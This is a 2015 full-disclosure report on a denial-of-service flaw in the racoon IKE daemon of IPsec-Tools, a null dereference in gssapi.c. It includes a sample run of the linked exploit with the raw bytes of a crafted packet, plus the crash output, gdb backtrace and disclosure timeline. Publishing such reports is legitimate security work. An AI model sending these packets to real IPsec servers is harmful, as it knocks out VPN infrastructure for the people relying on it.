Denial of Service in IPsec-Tools Vulnerability Report May 19, 2015 Product: IPsec-Tools Version: 0.8.2 Website: http://ipsec-tools.sourceforge.net/ CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) IPsec-Tools is vulnerable to a 0-day exploit that I made available yesterday. It is a null dereference crash in racoon in gssapi.c. It requires HAVE_GSSAPI to be set, which is a configuration option. The impact is a denial of service against the IKE daemon. Because IPsec is critical infrastructure and this attack requires two UDP packets, it deserves a medium rating. This denial of service violates the premise that IPsec's security is built upon. More information about the impact can be found on my website linked below. If you're running IPsec-Tools, replace it sensibly as soon as possible. The reason this exploit is being released without patch on full disclosure is because the authors have apparently abandoned the software. The vulnerability: racoon/gssapi.c:205:static int gssapi_init(struct ph1handle *iph1) if (iph1->rmconf->proposal->gssid != NULL) { The exploit is available on my website: https://www.altsci.com/ipsec/ipsec-tools-sa.html Example Usage: python3 repro_racoon_dos129.py Warning: Unable to bind to port 500. Might not work. [Errno 13] Permission denied Umm, okay. 129 ('\x81\xcf{r\x8e\xb6a\xdd9\xf1\x87cP\xb1\x05\xc7\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00\x00\x98\r\x00\x00<\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x000\x01\x01\x00\x01\x00\x00\x00(\x01\x01\x00\x00\x80\x0b\x00\x01\x00\x0c\x00\x04\x00\x01Q\x80\x80\x01\x00\x07\x80\x0e\x01\x00\x80\x03\x00\x03\x80\x02\x00\x02\x80\x04\x00\x05\r\x00\x00\x14J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/\r\x00\x00\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00\x00\x00\x00\x18 () H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80\x00\x00\x00', ('192.168.88.247', 500)) 129 sending second packet Umm, okay. What it looks like on the server: sudo racoon -F -v -f server_racoon.conf >server_dos5m.txt 2>&1 & jvoss () ipsecu:~$ dmesg |tail [ 584.440533] AVX or AES-NI instructions are not detected. [ 584.442253] AVX or AES-NI instructions are not detected. [ 584.490468] AVX instructions are not detected. [13683.867215] init: upstart-udev-bridge main process (361) terminated with status 1 [13683.867223] init: upstart-udev-bridge main process ended, respawning [13683.867307] init: upstart-file-bridge main process (452) terminated with status 1 [13683.867313] init: upstart-file-bridge main process ended, respawning [13683.867386] init: upstart-socket-bridge main process (616) terminated with status 1 [13683.867392] init: upstart-socket-bridge main process ended, respawning [19912.460170] racoon[3701]: segfault at 100 ip 00007fe0eba84ce7 sp 00007ffff51db730 error 4 in racoon[7fe0eba5e000+93000] Messages printed by the daemon: 2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00 2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION 2015-04-27 15:22:14: INFO: received Vendor ID: DPD 2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947 2015-04-27 15:22:14: [169.254.44.43] ERROR: ignore the packet, received unexpecting payload type 128. 2015-04-27 15:22:14: INFO: respond new phase 1 negotiation: 169.254.88.251[500]<=>169.254.44.43[42258] 2015-04-27 15:22:14: INFO: begin Identity Protection mode. 2015-04-27 15:22:14: INFO: received Vendor ID: RFC 3947 2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02 2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-02 2015-04-27 15:22:14: INFO: received Vendor ID: draft-ietf-ipsec-nat-t-ike-00 2015-04-27 15:22:14: INFO: received broken Microsoft ID: FRAGMENTATION 2015-04-27 15:22:14: INFO: received Vendor ID: DPD 2015-04-27 15:22:14: [169.254.44.43] INFO: Selected NAT-T version: RFC 3947 Stack trace and related debugging information (apologies for the lack of symbols): Program received signal SIGSEGV, Segmentation fault. 0x000055555557ace7 in ?? () (gdb) bt #0 0x000055555557ace7 in ?? () #1 0x000055555557b775 in ?? () #2 0x000055555556c1a1 in ?? () #3 0x0000555555563fd1 in ?? () #4 0x00005555555658ec in ?? () #5 0x000055555555fc9d in ?? () #6 0x000055555555f273 in ?? () #7 0x00007ffff6953ec5 in __libc_start_main (main=0x55555555f010, argc=5, argv=0x7fffffffe738, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe728) at libc-start.c:287 #8 0x000055555555f3ec in ?? () (gdb) x/15i $rip - 12 0x55555557acdb: mov %eax,0x1c8(%rsp) 0x55555557ace2: mov 0x28(%r12),%rax => 0x55555557ace7: mov 0x100(%rax),%rax 0x55555557acee: mov 0x30(%rax),%rax 0x55555557acf2: test %rax,%rax 0x55555557acf5: je 0x55555557af00 0x55555557acfb: mov (%rax),%rdx 0x55555557acfe: lea 0x20(%rsp),%r13 0x55555557ad03: mov 0x8(%rax),%rax 0x55555557ad07: lea 0x1c(%rsp),%rbx 0x55555557ad0c: lea 0x30(%rsp),%rsi 0x55555557ad11: mov %r13,%rcx 0x55555557ad14: mov %rdx,0x30(%rsp) 0x55555557ad19: mov %rbx,%rdi 0x55555557ad1c: xor %edx,%edx (gdb) i r rax 0x0 0 rbx 0x0 0 rcx 0x5555558dbe40 93824995933760 rdx 0x5555558dbe40 93824995933760 rsi 0x0 0 rdi 0x5555558dbdc0 93824995933632 rbp 0x5555558dbdc0 0x5555558dbdc0 rsp 0x7fffffffd180 0x7fffffffd180 r8 0x5555558dbdc0 93824995933632 r9 0x7ffff6cf07b8 140737334151096 r10 0xbdb00 776960 r11 0x5555558da301 93824995926785 r12 0x5555558da300 93824995926784 r13 0x555555822460 93824995173472 r14 0x5555558da420 93824995927072 r15 0x7fffffffd260 140737488343648 rip 0x55555557ace7 0x55555557ace7 eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 Tested platforms: Ubuntu Gentoo (USE flag kerberos) This vulnerability affects many platforms (NetBSD and FreeBSD for example), but I did not have time to test them. If your system is running IPsec-Tools and you are not sure whether it is vulnerable, please test it. Disclosure Timeline: Found: Nov 2013 Reported to author: Dec 2013 Reported to author: May 2015 Full Disclosure: Mon, May 18, 2015 If anyone has questions or comments about this or related topics, feel free to contact me. Regards, Javantea